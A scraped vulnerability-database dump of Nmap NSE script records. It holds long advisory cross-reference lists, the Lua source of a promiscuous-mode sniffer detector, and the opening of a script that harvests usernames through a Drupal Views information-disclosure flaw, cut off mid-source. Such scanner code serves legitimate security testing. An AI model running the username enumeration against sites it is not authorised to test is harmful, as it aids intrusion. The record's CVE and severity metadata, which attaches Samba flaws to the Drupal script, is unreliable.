"NMAP:PCANYWHERE-BRUTE.NSE", "NMAP:PCWORX-INFO.NSE", "NMAP:PGSQL-BRUTE.NSE", "NMAP:PJL-READY-MESSAGE.NSE", "NMAP:POP3-BRUTE.NSE", "NMAP:POP3-CAPABILITIES.NSE", "NMAP:POP3-NTLM-INFO.NSE", "NMAP:PORT-STATES.NSE", "NMAP:PPTP-VERSION.NSE", "NMAP:PUPPET-NAIVESIGNING.NSE", "NMAP:QCONN-EXEC.NSE", "NMAP:QSCAN.NSE", "NMAP:QUAKE1-INFO.NSE", "NMAP:QUAKE3-INFO.NSE", "NMAP:QUAKE3-MASTER-GETSERVERS.NSE", "NMAP:RDP-ENUM-ENCRYPTION.NSE", "NMAP:RDP-NTLM-INFO.NSE", "NMAP:RDP-VULN-MS12-020.NSE", "NMAP:REALVNC-AUTH-BYPASS.NSE", "NMAP:REDIS-BRUTE.NSE", "NMAP:REDIS-INFO.NSE", "NMAP:RESOLVEALL.NSE", "NMAP:REVERSE-INDEX.NSE", "NMAP:REXEC-BRUTE.NSE", "NMAP:RFC868-TIME.NSE", "NMAP:RIAK-HTTP-INFO.NSE", "NMAP:RLOGIN-BRUTE.NSE", "NMAP:RMI-DUMPREGISTRY.NSE", "NMAP:RMI-VULN-CLASSLOADER.NSE", "NMAP:RPC-GRIND.NSE", "NMAP:RPCAP-BRUTE.NSE", "NMAP:RPCAP-INFO.NSE", "NMAP:RPCINFO.NSE", "NMAP:RSA-VULN-ROCA.NSE", "NMAP:RSYNC-BRUTE.NSE", "NMAP:RSYNC-LIST-MODULES.NSE", "NMAP:RTSP-METHODS.NSE", "NMAP:RTSP-URL-BRUTE.NSE", "NMAP:RUSERS.NSE", "NMAP:S7-INFO.NSE", "NMAP:SAMBA-VULN-CVE-2012-1182.NSE", "NMAP:SERVICETAGS.NSE", "NMAP:SHODAN-API.NSE", "NMAP:SIP-BRUTE.NSE", "NMAP:SIP-CALL-SPOOF.NSE", "NMAP:SIP-ENUM-USERS.NSE", "NMAP:SIP-METHODS.NSE", "NMAP:SKYPEV2-VERSION.NSE", "NMAP:SMB-BRUTE.NSE", "NMAP:SMB-DOUBLE-PULSAR-BACKDOOR.NSE", "NMAP:SMB-ENUM-DOMAINS.NSE", "NMAP:SMB-ENUM-GROUPS.NSE", "NMAP:SMB-ENUM-PROCESSES.NSE", "NMAP:SMB-ENUM-SERVICES.NSE", "NMAP:SMB-ENUM-SESSIONS.NSE", "NMAP:SMB-ENUM-SHARES.NSE", "NMAP:SMB-ENUM-USERS.NSE", "NMAP:SMB-FLOOD.NSE", "NMAP:SMB-LS.NSE", "NMAP:SMB-MBENUM.NSE", "NMAP:SMB-OS-DISCOVERY.NSE", "NMAP:SMB-PRINT-TEXT.NSE", "NMAP:SMB-PROTOCOLS.NSE", "NMAP:SMB-PSEXEC.NSE", "NMAP:SMB-SECURITY-MODE.NSE", "NMAP:SMB-SERVER-STATS.NSE", "NMAP:SMB-SYSTEM-INFO.NSE", "NMAP:SMB-VULN-CONFICKER.NSE", "NMAP:SMB-VULN-CVE-2017-7494.NSE", "NMAP:SMB-VULN-CVE2009-3103.NSE", "NMAP:SMB-VULN-MS06-025.NSE", "NMAP:SMB-VULN-MS07-029.NSE", "NMAP:SMB-VULN-MS08-067.NSE", "NMAP:SMB-VULN-MS10-054.NSE", "NMAP:SMB-VULN-MS10-061.NSE", "NMAP:SMB-VULN-MS17-010.NSE", "NMAP:SMB-VULN-REGSVC-DOS.NSE", "NMAP:SMB-VULN-WEBEXEC.NSE", "NMAP:SMB-WEBEXEC-EXPLOIT.NSE", "NMAP:SMB2-CAPABILITIES.NSE", "NMAP:SMB2-SECURITY-MODE.NSE", "NMAP:SMB2-TIME.NSE", "NMAP:SMB2-VULN-UPTIME.NSE", "NMAP:SMTP-BRUTE.NSE", "NMAP:SMTP-COMMANDS.NSE", "NMAP:SMTP-ENUM-USERS.NSE", "NMAP:SMTP-NTLM-INFO.NSE", "NMAP:SMTP-OPEN-RELAY.NSE", "NMAP:SMTP-STRANGEPORT.NSE", "NMAP:SMTP-VULN-CVE2010-4344.NSE", "NMAP:SMTP-VULN-CVE2011-1720.NSE", "NMAP:SMTP-VULN-CVE2011-1764.NSE", "NMAP:SNMP-BRUTE.NSE", "NMAP:SNMP-HH3C-LOGINS.NSE", "NMAP:SNMP-INFO.NSE", "NMAP:SNMP-INTERFACES.NSE", "NMAP:SNMP-IOS-CONFIG.NSE", "NMAP:SNMP-NETSTAT.NSE", "NMAP:SNMP-PROCESSES.NSE", "NMAP:SNMP-SYSDESCR.NSE", "NMAP:SNMP-WIN32-SERVICES.NSE", "NMAP:SNMP-WIN32-SHARES.NSE", "NMAP:SNMP-WIN32-SOFTWARE.NSE", "NMAP:SNMP-WIN32-USERS.NSE", "NMAP:SOCKS-AUTH-INFO.NSE", "NMAP:SOCKS-BRUTE.NSE", "NMAP:SOCKS-OPEN-PROXY.NSE", "NMAP:SSH-AUTH-METHODS.NSE", "NMAP:SSH-BRUTE.NSE", "NMAP:SSH-HOSTKEY.NSE", "NMAP:SSH-PUBLICKEY-ACCEPTANCE.NSE", "NMAP:SSH-RUN.NSE", "NMAP:SSH2-ENUM-ALGOS.NSE", "NMAP:SSHV1.NSE", "NMAP:SSL-CCS-INJECTION.NSE", "NMAP:SSL-CERT-INTADDR.NSE", "NMAP:SSL-CERT.NSE", "NMAP:SSL-DATE.NSE", "NMAP:SSL-DH-PARAMS.NSE", "NMAP:SSL-ENUM-CIPHERS.NSE", "NMAP:SSL-HEARTBLEED.NSE", "NMAP:SSL-KNOWN-KEY.NSE", "NMAP:SSL-POODLE.NSE", "NMAP:SSLV2-DROWN.NSE", "NMAP:SSLV2.NSE", "NMAP:SSTP-DISCOVER.NSE", "NMAP:STUN-INFO.NSE", "NMAP:STUN-VERSION.NSE", "NMAP:STUXNET-DETECT.NSE", "NMAP:SUPERMICRO-IPMI-CONF.NSE", "NMAP:SVN-BRUTE.NSE", "NMAP:TARGETS-ASN.NSE", "NMAP:TARGETS-IPV6-MAP4TO6.NSE", "NMAP:TARGETS-IPV6-MULTICAST-ECHO.NSE", "NMAP:TARGETS-IPV6-MULTICAST-INVALID-DST.NSE", "NMAP:TARGETS-IPV6-MULTICAST-MLD.NSE", "NMAP:TARGETS-IPV6-MULTICAST-SLAAC.NSE", "NMAP:TARGETS-IPV6-WORDLIST.NSE", "NMAP:TARGETS-SNIFFER.NSE", "NMAP:TARGETS-TRACEROUTE.NSE", "NMAP:TARGETS-XML.NSE", "NMAP:TEAMSPEAK2-VERSION.NSE", "NMAP:TELNET-BRUTE.NSE", "NMAP:TELNET-ENCRYPTION.NSE", "NMAP:TELNET-NTLM-INFO.NSE", "NMAP:TFTP-ENUM.NSE", "NMAP:TLS-ALPN.NSE", "NMAP:TLS-NEXTPROTONEG.NSE", "NMAP:TLS-TICKETBLEED.NSE", "NMAP:TN3270-SCREEN.NSE", "NMAP:TOR-CONSENSUS-CHECKER.NSE", "NMAP:TRACEROUTE-GEOLOCATION.NSE", "NMAP:TSO-BRUTE.NSE", "NMAP:TSO-ENUM.NSE", "NMAP:UBIQUITI-DISCOVERY.NSE", "NMAP:UNITTEST.NSE", "NMAP:UNUSUAL-PORT.NSE", "NMAP:UPNP-INFO.NSE", "NMAP:UPTIME-AGENT-INFO.NSE", "NMAP:URL-SNARF.NSE", "NMAP:VENTRILO-INFO.NSE", "NMAP:VERSANT-INFO.NSE", "NMAP:VMAUTHD-BRUTE.NSE", "NMAP:VMWARE-VERSION.NSE", "NMAP:VNC-BRUTE.NSE", "NMAP:VNC-INFO.NSE", "NMAP:VNC-TITLE.NSE", "NMAP:VOLDEMORT-INFO.NSE", "NMAP:VTAM-ENUM.NSE", "NMAP:VULNERS.NSE", "NMAP:VUZE-DHT-INFO.NSE", "NMAP:WDB-VERSION.NSE", "NMAP:WEBLOGIC-T3-INFO.NSE", "NMAP:WHOIS-DOMAIN.NSE", "NMAP:WHOIS-IP.NSE", "NMAP:WSDD-DISCOVER.NSE", "NMAP:X11-ACCESS.NSE", "NMAP:XDMCP-DISCOVER.NSE", "NMAP:XMLRPC-METHODS.NSE", "NMAP:XMPP-BRUTE.NSE", "NMAP:XMPP-INFO.NSE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310123690", "OPENVAS:1361412562310123695", "OPENVAS:1361412562310123940", "OPENVAS:1361412562310123943", "OPENVAS:1361412562310703860", "OPENVAS:136141256231071254", "OPENVAS:136141256231071279", "OPENVAS:136141256231071548", "OPENVAS:1361412562310802794", "OPENVAS:1361412562310811055", "OPENVAS:1361412562310831574", "OPENVAS:1361412562310840980", "OPENVAS:1361412562310843180", "OPENVAS:1361412562310850203", "OPENVAS:1361412562310850289", "OPENVAS:1361412562310851557", "OPENVAS:1361412562310851559", "OPENVAS:1361412562310864158", "OPENVAS:1361412562310864174", "OPENVAS:1361412562310864200", "OPENVAS:1361412562310864205", "OPENVAS:1361412562310864213", "OPENVAS:1361412562310864238", "OPENVAS:1361412562310864306", "OPENVAS:1361412562310865323", "OPENVAS:1361412562310865347", "OPENVAS:1361412562310870581", "OPENVAS:1361412562310870584", "OPENVAS:1361412562310870928", "OPENVAS:1361412562310870935", "OPENVAS:1361412562310871821", "OPENVAS:1361412562310871822", "OPENVAS:1361412562310872718", "OPENVAS:1361412562310872719", "OPENVAS:1361412562310881179", "OPENVAS:1361412562310881194", "OPENVAS:1361412562310881228", "OPENVAS:1361412562310881650", "OPENVAS:1361412562310881654", "OPENVAS:1361412562310881680", "OPENVAS:1361412562310882723", "OPENVAS:1361412562310882724", "OPENVAS:1361412562310882726", "OPENVAS:1361412562310890951", "OPENVAS:1361412562311220171104", "OPENVAS:1361412562311220171105", "OPENVAS:703860", "OPENVAS:71254", "OPENVAS:71279", "OPENVAS:71548", "OPENVAS:802794", "OPENVAS:831574", "OPENVAS:840980", "OPENVAS:850203", "OPENVAS:850289", "OPENVAS:864158", "OPENVAS:864174", "OPENVAS:864200", "OPENVAS:864205", "OPENVAS:864213", "OPENVAS:864238", "OPENVAS:864306", "OPENVAS:865323", "OPENVAS:865347", "OPENVAS:870581", "OPENVAS:870584", "OPENVAS:870928", "OPENVAS:870935", "OPENVAS:881179", "OPENVAS:881194", "OPENVAS:881228", "OPENVAS:881650", "OPENVAS:881654", "OPENVAS:881680"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0465", "ELSA-2012-0466", "ELSA-2012-0478", "ELSA-2013-0506", "ELSA-2013-0515", "ELSA-2017-1270", "ELSA-2017-1271", "ELSA-2017-1272", "ELSA-2017-1950", "ELSA-2018-1860"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:116843", "PACKETSTORM:116953", "PACKETSTORM:142657", "PACKETSTORM:142715", "PACKETSTORM:142782"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:D20A6BA20BB0FAD48EDDE6836F08EDBA"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:38689BEB2152AB6F6A52F8E26AA1499F", "RAPID7COMMUNITY:41DCA564C1D56E5188C09BCC956BC029", "RAPID7COMMUNITY:70F4A599D7DDC69173F490543EA5873E", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595"]}, {"type": "redhat", "idList": ["RHSA-2012:0465", "RHSA-2012:0466", "RHSA-2012:0478", "RHSA-2013:0506", "RHSA-2013:0515", "RHSA-2017:1270", "RHSA-2017:1271", "RHSA-2017:1272", "RHSA-2017:1273", "RHSA-2017:1390"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-7494"]}, {"type": "saint", "idList": ["SAINT:3579A721D51A069C725493EA48A26E42", "SAINT:6FE788CBA26F517C02B44A699047593B", "SAINT:C50A339EFD5B2F96051BC00F96014CAA"]}, {"type": "samba", "idList": ["SAMBA:CVE-2012-1182", "SAMBA:CVE-2017-7494"]}, {"type": "securelist", "idList": ["SECURELIST:A16165B9EDE725C7470E1FA5D469DA0F"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:28165", "SECURITYVULNS:VULN:12328", "SECURITYVULNS:VULN:12426", "SECURITYVULNS:VULN:12518"]}, {"type": "seebug", "idList": ["SSV:60050", "SSV:93139"]}, {"type": "slackware", "idList": ["SSA-2017-144-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2012:0507-1", "OPENSUSE-SU-2012:0508-1", "OPENSUSE-SU-2017:1401-1", "OPENSUSE-SU-2017:1415-1", "SUSE-SU-2012:0500-1", "SUSE-SU-2012:0501-1", "SUSE-SU-2012:0501-2", "SUSE-SU-2012:0502-1", "SUSE-SU-2012:0504-1", "SUSE-SU-2012:0515-1", "SUSE-SU-2017:1391-1", "SUSE-SU-2017:1392-1", "SUSE-SU-2017:1393-1"]}, {"type": "talosblog", "idList": ["TALOSBLOG:9256DE4CBAB937F2D9EAEDCA068E3DE9"]}, {"type": "thn", "idList": ["THN:4706A097E7EBD85B2426246B35CDC5E6", "THN:590A2A4F40D408F427266EBA5EE7B530", "THN:9D54715DA42C8EB2A5D3C8AA0A5EE0B7", "THN:9DF1743B35B2E69D4835136091D08EAD", "THN:B1F7A116FFB321FFB433B2511F0594AA"]}, {"type": "threatpost", "idList": ["THREATPOST:5800C37DAB0716BD2D308FB187B6B7E1", "THREATPOST:6B393C6EA80E795EF303485AFABE5327", "THREATPOST:B108BD1ECF3200F21B65BFC1C849F747"]}, {"type": "ubuntu", "idList": ["USN-1423-1", "USN-3296-1", "USN-3296-2"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2012-1182", "UB:CVE-2017-7494"]}, {"type": "zdi", "idList": ["ZDI-12-061", "ZDI-12-062", "ZDI-12-063", "ZDI-12-064", "ZDI-12-068", "ZDI-12-069", "ZDI-12-070", "ZDI-12-071", "ZDI-12-072"]}, {"type": "zdt", "idList": ["1337DAY-ID-27836", "1337DAY-ID-27859"]}]}, "backreferences": {"references": [{"type": "amazon", "idList": ["ALAS-2017-834"]}, {"type": "archlinux", "idList": ["ASA-201705-22"]}, {"type": "attackerkb", "idList": ["AKB:49AAF9A1-B710-4CA1-AAFA-3C022294A5D4"]}, {"type": "avleonov", "idList": ["AVLEONOV:40C2BE2DE75816DD7ED47DA106AF9627"]}, {"type": "canvas", "idList": ["SAMBA_IS_KNOWN_PIPENAME"]}, {"type": "centos", "idList": ["CESA-2017:1270", "CESA-2017:1271"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0444"]}, {"type": "cisa", "idList": ["CISA:384A71FB1AD858FAC86EEB1A7660E778"]}, {"type": "cisco", "idList": ["CISCO-SA-20170530-SAMBA"]}, {"type": "cve", "idList": ["CVE-2012-1182", "CVE-2017-7494"]}, {"type": "debian", "idList": ["DEBIAN:DLA-951-1:1BAA2", "DEBIAN:DSA-3860-1:8B793"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2017-7494"]}, {"type": "exploitdb", "idList": ["EDB-ID:42060", "EDB-ID:42084"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:11BDEE18B40708887778CCF837705185"]}, {"type": "f5", "idList": ["F5:K13551136", "SOL13719"]}, {"type": "fedora", "idList": ["FEDORA:0B8006061CC2", "FEDORA:219F3605E539", "FEDORA:79D7720B02", "FEDORA:BC7B0601FC16"]}, {"type": "fireeye", "idList": ["FIREEYE:DC498F7CA24681C582F008B675092B7D"]}, {"type": "freebsd", "idList": ["6F4D96C0-4062-11E7-B291-B499BAEBFEAF", "BAF37CD2-8351-11E1-894E-00215C6A37BB"]}, {"type": "gentoo", "idList": ["GLSA-201805-07"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170613-01-SAMBA", "HUAWEI-SA-20171129-01-SAMBA"]}, {"type": "ibm", "idList": ["82248DC9C1F555BF98367B4387954D2C23BFE20908CE565E0127C6A3FC16193E", "CE6756539D503C94C0FE819367133FAF5CF98E845923A4230C5E49923B068701"]}, {"type": "ics", "idList": ["ICSA-17-180-02"]}, {"type": "kitploit", "idList": ["KITPLOIT:5052987141331551837"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/SAMBA/IS_KNOWN_PIPENAME"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786440", "MYHACK58:62201786477", "MYHACK58:62201786521", "MYHACK58:62201786995"]}, {"type": "nessus", "idList": ["ALA_ALAS-2017-834.NASL", "CENTOS_RHSA-2017-1270.NASL", "CENTOS_RHSA-2017-1271.NASL", "DEBIAN_DLA-951.NASL", "DEBIAN_DSA-3860.NASL", "EULEROS_SA-2017-1104.NASL", "EULEROS_SA-2017-1105.NASL", "FEDORA_2017-570C0071C4.NASL", "FEDORA_2017-642A0ECA75.NASL", "FREEBSD_PKG_6F4D96C0406211E7B291B499BAEBFEAF.NASL", "OPENSUSE-2017-613.NASL", "OPENSUSE-2017-618.NASL", "ORACLELINUX_ELSA-2013-0506.NASL", "ORACLELINUX_ELSA-2017-1270.NASL", "ORACLELINUX_ELSA-2017-1271.NASL", "ORACLELINUX_ELSA-2017-1272.NASL", "REDHAT-RHSA-2013-0515.NASL", "REDHAT-RHSA-2017-1270.NASL", "REDHAT-RHSA-2017-1271.NASL", "REDHAT-RHSA-2017-1272.NASL", "REDHAT-RHSA-2017-1273.NASL", "REDHAT-RHSA-2017-1390.NASL", "SLACKWARE_SSA_2017-144-01.NASL", "SL_20170524_SAMBA4_ON_SL6_X.NASL", "SL_20170524_SAMBA_ON_SL6_X.NASL", "SUSE_SU-2017-1391-1.NASL", "SUSE_SU-2017-1392-1.NASL", "SUSE_SU-2017-1393-1.NASL", "SUSE_SU-2017-1396-1.NASL", "UBUNTU_USN-3296-1.NASL", "UBUNTU_USN-3296-2.NASL"]}, {"type": "nmap", "idList": ["NMAP:AJP-HEADERS.NSE", "NMAP:AUTH-OWNERS.NSE", "NMAP:BROADCAST-DNS-SERVICE-DISCOVERY.NSE", "NMAP:BROADCAST-IGMP-DISCOVERY.NSE", "NMAP:CICS-INFO.NSE", "NMAP:CITRIX-ENUM-SERVERS.NSE", "NMAP:CLAMAV-EXEC.NSE", "NMAP:COUCHDB-DATABASES.NSE", "NMAP:DAYTIME.NSE", "NMAP:DNS-CACHE-SNOOP.NSE", "NMAP:FTP-SYST.NSE", "NMAP:HADOOP-TASKTRACKER-INFO.NSE", "NMAP:HDDTEMP-INFO.NSE", "NMAP:HTTP-ADOBE-COLDFUSION-APSA1301.NSE", "NMAP:HTTP-APACHE-SERVER-STATUS.NSE", "NMAP:HTTP-GENERATOR.NSE", "NMAP:HTTP-INTERNAL-IP-DISCLOSURE.NSE", "NMAP:HTTP-NTLM-INFO.NSE", "NMAP:MS-SQL-XP-CMDSHELL.NSE", "NMAP:MYSQL-VARIABLES.NSE", "NMAP:NAT-PMP-INFO.NSE", "NMAP:ORACLE-ENUM-USERS.NSE", "NMAP:POP3-NTLM-INFO.NSE", "NMAP:RFC868-TIME.NSE", "NMAP:RPC-GRIND.NSE", "NMAP:S7-INFO.NSE", "NMAP:SSH-PUBLICKEY-ACCEPTANCE.NSE", "NMAP:SSH-RUN.NSE", "NMAP:SSL-DH-PARAMS.NSE", "NMAP:TARGETS-IPV6-MAP4TO6.NSE", "NMAP:TARGETS-IPV6-MULTICAST-INVALID-DST.NSE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310123690", "OPENVAS:136141256231014259", "OPENVAS:1361412562310881179", "OPENVAS:1361412562310890951", "OPENVAS:864174", "OPENVAS:864213", "OPENVAS:865347"]}, {"type": "oraclelinux", "idList": ["ELSA-2017-1270", "ELSA-2017-1271", "ELSA-2017-1272"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142657", "PACKETSTORM:142715", "PACKETSTORM:142782"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:D20A6BA20BB0FAD48EDDE6836F08EDBA"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:38689BEB2152AB6F6A52F8E26AA1499F", "RAPID7COMMUNITY:70F4A599D7DDC69173F490543EA5873E", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595"]}, {"type": "redhat", "idList": ["RHSA-2017:1271"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-7494"]}, {"type": "saint", "idList": ["SAINT:3579A721D51A069C725493EA48A26E42", "SAINT:C50A339EFD5B2F96051BC00F96014CAA"]}, {"type": "samba", "idList": ["SAMBA:CVE-2012-1182"]}, {"type": "securelist", "idList": ["SECURELIST:A16165B9EDE725C7470E1FA5D469DA0F"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12426"]}, {"type": "seebug", "idList": ["SSV:93139"]}, {"type": "slackware", "idList": ["SSA-2017-144-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2017:1401-1", "OPENSUSE-SU-2017:1415-1", "SUSE-SU-2017:1391-1", "SUSE-SU-2017:1392-1", "SUSE-SU-2017:1393-1"]}, {"type": "talosblog", "idList": ["TALOSBLOG:9256DE4CBAB937F2D9EAEDCA068E3DE9"]}, {"type": "thn", "idList": ["THN:4706A097E7EBD85B2426246B35CDC5E6", "THN:590A2A4F40D408F427266EBA5EE7B530", "THN:9D54715DA42C8EB2A5D3C8AA0A5EE0B7", "THN:9DF1743B35B2E69D4835136091D08EAD", "THN:B1F7A116FFB321FFB433B2511F0594AA"]}, {"type": "threatpost", "idList": ["THREATPOST:5800C37DAB0716BD2D308FB187B6B7E1", "THREATPOST:6B393C6EA80E795EF303485AFABE5327", "THREATPOST:B108BD1ECF3200F21B65BFC1C849F747"]}, {"type": "ubuntu", "idList": ["USN-3296-2"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-7494"]}, {"type": "zdi", "idList": ["ZDI-12-062"]}, {"type": "zdt", "idList": ["1337DAY-ID-27836"]}]}, "exploitation": null, "vulnersScore": 6.4}, "_state": {"dependencies": 1647589307, "score": 0}, "sourceData": "local nmap = require \"nmap\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\ndescription = [[\nChecks if a target on a local Ethernet has its network card in promiscuous mode.\n\nThe techniques used are described at\nhttp://www.securityfriday.com/promiscuous_detection_01.pdf.\n]]\n\n---\n-- @output\n-- Host script results:\n-- |_ sniffer-detect: Likely in promiscuous mode (tests: \"11111111\")\n\n\nauthor = \"Marek Majkowski\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"discovery\", \"intrusive\"}\n\n-- okay, we're interested only in hosts that are on our ethernet lan\nhostrule = function(host)\n if nmap.address_family() ~= 'inet' then\n stdnse.debug1(\"is IPv4 compatible only.\")\n return false\n end\n if host.directly_connected == true and\n host.mac_addr ~= nil and\n host.mac_addr_src ~= nil and\n host.interface ~= nil then\n local iface = nmap.get_interface_info(host.interface)\n if iface and iface.link == 'ethernet' then\n return true\n end\n end\n return false\nend\n\nlocal function check (layer2)\n return string.sub(layer2, 0, 12)\nend\n\n\ndo_test = function(dnet, pcap, host, test)\n local status, length, layer2, layer3\n local i = 0\n\n -- ARP requests are send with timeouts: 10ms, 40ms, 90ms\n -- before each try, we wait at least 100ms\n -- in summary, this test takes at least 100ms and at most 440ms\n for i=1,3 do\n -- flush buffers :), wait quite long.\n repeat\n pcap:set_timeout(100)\n local test = host.mac_addr_src .. host.mac_addr\n status, length, layer2, layer3 = pcap:pcap_receive()\n while status and test ~= check(layer2) do\n status, length, layer2, layer3 = pcap:pcap_receive()\n end\n until status ~= true\n pcap:set_timeout(10 * i*i)\n\n dnet:ethernet_send(test)\n\n local test = host.mac_addr_src .. host.mac_addr\n status, length, layer2, layer3 = pcap:pcap_receive()\n while status and test ~= check(layer2) do\n status, length, layer2, layer3 = pcap:pcap_receive()\n end\n if status == true then\n -- the basic idea, was to inform user about time, when we got packet\n -- so that 1 would mean (0-10ms), 2=(10-40ms) and 3=(40ms-90ms)\n -- but when we're running this tests on macs, first test is always 2.\n -- which means that the first answer is dropped.\n -- for now, just return 1 if test was successful, it's easier\n -- return(i)\n return(1)\n end\n end\n return('_')\nend\n\naction = function(host)\n local dnet = nmap.new_dnet()\n local pcap = nmap.new_socket()\n local _\n local status\n local results = {\n ['1_____1_'] = false, -- MacOSX(Tiger.Panther)/Linux/ ?Win98/ WinXP sp2(no pcap)\n ['1_______'] = false, -- Old Apple/SunOS/3Com\n ['1___1_1_'] = false, -- MacOSX(Tiger)\n ['11111111'] = true, -- BSD/Linux/OSX/ (or not promiscuous openwrt )\n ['1_1___1_'] = false, -- WinXP sp2 + pcap|| win98 sniff || win2k sniff (see below)\n ['111___1_'] = true, -- WinXP sp2 promisc\n --['1111__1_'] = true, -- ?Win98 promisc + ??win98 no promisc *not confirmed*\n }\n dnet:ethernet_open(host.interface)\n\n pcap:pcap_open(host.interface, 64, false, \"arp\")\n\n local test_static = host.mac_addr_src ..\n \"\\x08\\x06\\x00\\x01\\x08\\x00\\x06\\x04\\x00\\x01\" ..\n host.mac_addr_src ..\n host.bin_ip_src ..\n \"\\x00\\x00\\x00\\x00\\x00\\x00\" ..\n host.bin_ip\n local t = {\n \"\\xff\\xff\\xff\\xff\\xff\\xff\", -- B32 no meaning?\n \"\\xff\\xff\\xff\\xff\\xff\\xfe\", -- B31\n \"\\xff\\xff\\x00\\x00\\x00\\x00\", -- B16\n \"\\xff\\x00\\x00\\x00\\x00\\x00\", -- B8\n \"\\x01\\x00\\x00\\x00\\x00\\x00\", -- G\n \"\\x01\\x00\\x5e\\x00\\x00\\x00\", -- M0\n \"\\x01\\x00\\x5e\\x00\\x00\\x01\", -- M1 no meaning?\n \"\\x01\\x00\\x5e\\x00\\x00\\x03\", -- M3\n }\n local v\n local out = {}\n for _, v in ipairs(t) do\n out[#out+1] = do_test(dnet, pcap, host, v .. test_static)\n end\n out = table.concat(out)\n\n dnet:ethernet_close()\n pcap:pcap_close()\n\n if out == '1_1___1_' then\n return 'Windows with libpcap installed; may or may not be sniffing (tests: \"' .. out .. '\")'\n end\n if results[out] == false then\n -- probably not sniffing\n return\n end\n if results[out] == true then\n -- rather sniffer.\n return 'Likely in promiscuous mode (tests: \"' .. out .. '\")'\n end\n\n -- results[out] == nil\n return 'Unknown (tests: \"' .. out .. '\")'\nend\n", "nmap": {"scriptType": "hostrule", "categories": ["discovery", "intrusive"]}}

{"nmap": [{"lastseen": "2022-02-15T21:44:04", "description": "Enumerates Drupal users by exploiting an information disclosure vulnerability in Views, Drupal's most popular module. \n\nRequests to admin/views/ajax/autocomplete/user/STRING return all usernames that begin with STRING. The script works by iterating STRING over letters to extract all usernames. \n\nFor more information,see: \n\n * <http://www.madirish.net/node/465>\n\n### See also:\n\n * [ http-vuln-cve2014-3704.nse ](<../scripts/http-vuln-cve2014-3704.html>)\n\n## Script Arguments \n\n#### http-drupal-enum-users.root \n\nbase path. Defaults to \"/\"\n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script=http-drupal-enum-users --script-args http-drupal-enum-users.root=\"/path/\" <targets>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 80/tcp open http syn-ack\n | http-drupal-enum-users:\n | admin\n | alex\n | manager\n |_ user\n \n\n## Requires \n\n * [http](<../lib/http.html>)\n * [json](<../lib/json.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-03-22T00:09:28", "type": "nmap", "title": "http-drupal-enum-users NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2017-01-23T20:37:22", "id": "NMAP:HTTP-DRUPAL-ENUM-USERS.NSE", "href": "https://nmap.org/nsedoc/scripts/http-drupal-enum-users.html", "sourceData": "local http = require \"http\"\nlocal json = require \"json\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\n\ndescription = [[\nEnumerates Drupal users by exploiting an information disclosure vulnerability\nin Views, Drupal's most popular module.\n\nRequests to admin/views/ajax/autocomplete/user/STRING return all usernames that\nbegin with STRING. The script works by iterating STRING over letters to extract\nall usernames.\n\nFor more information,see:\n* http://www.madirish.net/node/465\n]]\n\n---\n-- @see http-vuln-cve2014-3704.nse\n--\n-- @usage\n-- nmap --script=http-drupal-enum-users --script-args http-drupal-enum-users.root=\"/path/\" <targets>\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 80/tcp open http syn-ack\n-- | http-drupal-enum-users:\n-- | 